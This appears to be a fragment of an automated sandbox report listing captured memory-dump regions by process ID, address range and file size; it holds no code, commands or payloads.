memory/2176-157-0x0000000003930000-0x000000000396C000-memory.dmpFilesize
240KB
-
memory/2176-179-0x0000000005100000-0x0000000005101000-memory.dmpFilesize
4KB
-
memory/2176-171-0x0000000005080000-0x0000000005081000-memory.dmpFilesize
4KB
-
memory/2176-178-0x00000000050F0000-0x00000000050F1000-memory.dmpFilesize
4KB
-
memory/2176-166-0x0000000005030000-0x0000000005031000-memory.dmpFilesize
4KB
-
memory/2196-287-0x0000000000000000-mapping.dmp
-
memory/2196-299-0x0000000001900000-0x0000000001902000-memory.dmpFilesize
8KB
-
memory/2356-210-0x00000000006C0000-0x00000000006C1000-memory.dmpFilesize
4KB
-
memory/2356-208-0x0000000000680000-0x00000000006B0000-memory.dmpFilesize
192KB
-
memory/2356-205-0x0000000000670000-0x0000000000671000-memory.dmpFilesize
4KB
-
memory/2356-199-0x0000000000150000-0x0000000000151000-memory.dmpFilesize
4KB
-
memory/2356-196-0x0000000000000000-mapping.dmp
-
memory/2356-217-0x000000001AE00000-0x000000001AE02000-memory.dmpFilesize
8KB
-
memory/2572-365-0x0000019B65E00000-0x0000019B65E71000-memory.dmpFilesize
452KB
-
memory/2632-252-0x0000000000000000-mapping.dmp
-
memory/2636-347-0x0000000000000000-mapping.dmp
-
memory/2636-209-0x00000000047D0000-0x00000000047D1000-memory.dmpFilesize
4KB
-
memory/2636-214-0x0000000004330000-0x0000000004331000-memory.dmpFilesize
4KB
-
memory/2636-211-0x00000000042A0000-0x00000000042AC000-memory.dmpFilesize
48KB
-
memory/2636-213-0x00000000049B0000-0x00000000049B1000-memory.dmpFilesize
4KB
-
memory/2636-206-0x0000000000040000-0x0000000000041000-memory.dmpFilesize
4KB
-
memory/2636-201-0x0000000000000000-mapping.dmp
-
memory/2636-212-0x0000000009230000-0x0000000009231000-memory.dmpFilesize
4KB
-
memory/2660-499-0x0000000000000000-mapping.dmp
-
memory/3512-351-0x0000000000000000-mapping.dmp
-
memory/3556-303-0x0000000000150000-0x00000000001FE000-memory.dmpFilesize
696KB
-
memory/3556-258-0x0000000000000000-mapping.dmp
-
memory/3640-368-0x00000000044A0000-0x00000000044FD000-memory.dmpFilesize
372KB
-
memory/3640-363-0x0000000000E8F000-0x0000000000F90000-memory.dmpFilesize
1.0MB
-
memory/3640-350-0x0000000000000000-mapping.dmp
-
memory/3700-279-0x0000000001080000-0x0000000001082000-memory.dmpFilesize
8KB
-
memory/3700-272-0x00000000008D0000-0x00000000008D1000-memory.dmpFilesize
4KB
-
memory/3700-269-0x0000000000000000-mapping.dmp
-
memory/3700-280-0x000000001C510000-0x000000001C512000-memory.dmpFilesize
8KB
-
memory/3888-360-0x00007FF7A5304060-mapping.dmp
-
memory/3888-367-0x000002189E1B0000-0x000002189E221000-memory.dmpFilesize
452KB
-
memory/3960-418-0x0000000000000000-mapping.dmp
-
memory/4028-158-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/4028-148-0x0000000000000000-mapping.dmp
-
memory/4052-434-0x0000000000000000-mapping.dmp
-
memory/4212-503-0x0000000000000000-mapping.dmp
-
memory/4244-162-0x00000000023B4000-0x00000000023B6000-memory.dmpFilesize
8KB
-
memory/4244-160-0x00000000023B2000-0x00000000023B4000-memory.dmpFilesize
8KB
-
memory/4244-159-0x00000000023B0000-0x00000000023B2000-memory.dmpFilesize
8KB
-
memory/4244-181-0x00000000023B6000-0x00000000023B8000-memory.dmpFilesize
8KB
-
memory/4244-144-0x0000000000000000-mapping.dmp
-
memory/4244-147-0x00000000002B0000-0x00000000002B1000-memory.dmpFilesize
4KB
-
memory/4308-304-0x0000000000630000-0x0000000000652000-memory.dmpFilesize
136KB
-
memory/4308-312-0x0000000004AF0000-0x0000000004AF1000-memory.dmpFilesize
4KB
-
memory/4308-314-0x0000000004B30000-0x0000000004B31000-memory.dmpFilesize
4KB
-
memory/4308-313-0x0000000004A30000-0x0000000005036000-memory.dmpFilesize
6.0MB
-
memory/4308-309-0x0000000005040000-0x0000000005041000-memory.dmpFilesize
4KB
-
memory/4308-310-0x0000000004A90000-0x0000000004A91000-memory.dmpFilesize
4KB
-
memory/4308-311-0x0000000004BC0000-0x0000000004BC1000-memory.dmpFilesize
4KB
-
memory/4312-497-0x0000000000000000-mapping.dmp
-
memory/4424-283-0x0000000000000000-mapping.dmp
-
memory/4424-323-0x0000000000000000-mapping.dmp
-
memory/4432-247-0x0000000000000000-mapping.dmp
-
memory/4440-324-0x0000000000000000-mapping.dmp
-
memory/4540-239-0x0000000000000000-mapping.dmp
-
memory/4556-243-0x0000000000000000-mapping.dmp
-
memory/4580-322-0x000001DC5BA70000-0x000001DC5BA90000-memory.dmpFilesize
128KB
-
memory/4580-302-0x000001DC5BA50000-0x000001DC5BA70000-memory.dmpFilesize
128KB
-
memory/4580-294-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/4580-297-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/4580-296-0x000001DC5BA10000-0x000001DC5BA30000-memory.dmpFilesize
128KB
-
memory/4580-295-0x00000001402EB66C-mapping.dmp
-
memory/4608-255-0x0000000000000000-mapping.dmp
-
memory/4624-501-0x0000000000000000-mapping.dmp
-
memory/4824-116-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/4852-137-0x0000000003C90000-0x0000000003C91000-memory.dmpFilesize
4KB
-
memory/4852-128-0x0000000003C00000-0x0000000003C01000-memory.dmpFilesize
4KB
-
memory/4852-133-0x0000000003C50000-0x0000000003C51000-memory.dmpFilesize
4KB
-
memory/4852-126-0x0000000005170000-0x0000000005171000-memory.dmpFilesize
4KB
-
memory/4852-123-0x0000000005140000-0x0000000005141000-memory.dmpFilesize
4KB
-
memory/4852-124-0x0000000005150000-0x0000000005151000-memory.dmpFilesize
4KB
-
memory/4852-122-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4852-134-0x0000000003C60000-0x0000000003C61000-memory.dmpFilesize
4KB
-
memory/4852-129-0x0000000003C10000-0x0000000003C11000-memory.dmpFilesize
4KB
-
memory/4852-135-0x0000000003C70000-0x0000000003C71000-memory.dmpFilesize
4KB
-
memory/4852-125-0x0000000005160000-0x0000000005161000-memory.dmpFilesize
4KB
-
memory/4852-136-0x0000000003C80000-0x0000000003C81000-memory.dmpFilesize
4KB
-
memory/4852-138-0x0000000003CA0000-0x0000000003CA1000-memory.dmpFilesize
4KB
-
memory/4852-139-0x0000000003CB0000-0x0000000003CB1000-memory.dmpFilesize
4KB
-
memory/4852-140-0x0000000003CC0000-0x0000000003CC1000-memory.dmpFilesize
4KB
-
memory/4852-131-0x0000000003C30000-0x0000000003C31000-memory.dmpFilesize
4KB
-
memory/4852-117-0x0000000000000000-mapping.dmp
-
memory/4852-132-0x0000000003C40000-0x0000000003C41000-memory.dmpFilesize
4KB
-
memory/4852-127-0x0000000003BF0000-0x0000000003BF1000-memory.dmpFilesize
4KB
-
memory/4852-130-0x0000000003C20000-0x0000000003C21000-memory.dmpFilesize
4KB
-
memory/4864-422-0x0000000000000000-mapping.dmp
-
memory/4868-505-0x0000000000000000-mapping.dmp
-
memory/4904-229-0x000000000A990000-0x000000000A9C7000-memory.dmpFilesize
220KB
-
memory/4904-228-0x0000000001470000-0x0000000001471000-memory.dmpFilesize
4KB
-
memory/4904-263-0x0000000005D40000-0x0000000005D41000-memory.dmpFilesize
4KB
-
memory/4904-237-0x0000000005500000-0x0000000005501000-memory.dmpFilesize
4KB
-
memory/4904-218-0x0000000000000000-mapping.dmp
-
memory/4904-231-0x0000000002C90000-0x0000000002C91000-memory.dmpFilesize
4KB
-
memory/4904-244-0x0000000005680000-0x0000000005681000-memory.dmpFilesize
4KB
-
memory/4904-224-0x0000000000C90000-0x0000000000C91000-memory.dmpFilesize
4KB
-
memory/4924-236-0x0000000004F40000-0x0000000004F41000-memory.dmpFilesize
4KB
-
memory/4924-220-0x0000000000000000-mapping.dmp
-
memory/4924-238-0x00000000027D0000-0x00000000027D1000-memory.dmpFilesize
4KB
-
memory/5012-498-0x0000000000000000-mapping.dmp
-
memory/5036-141-0x0000000000000000-mapping.dmp
-
memory/5092-284-0x0000000000000000-mapping.dmp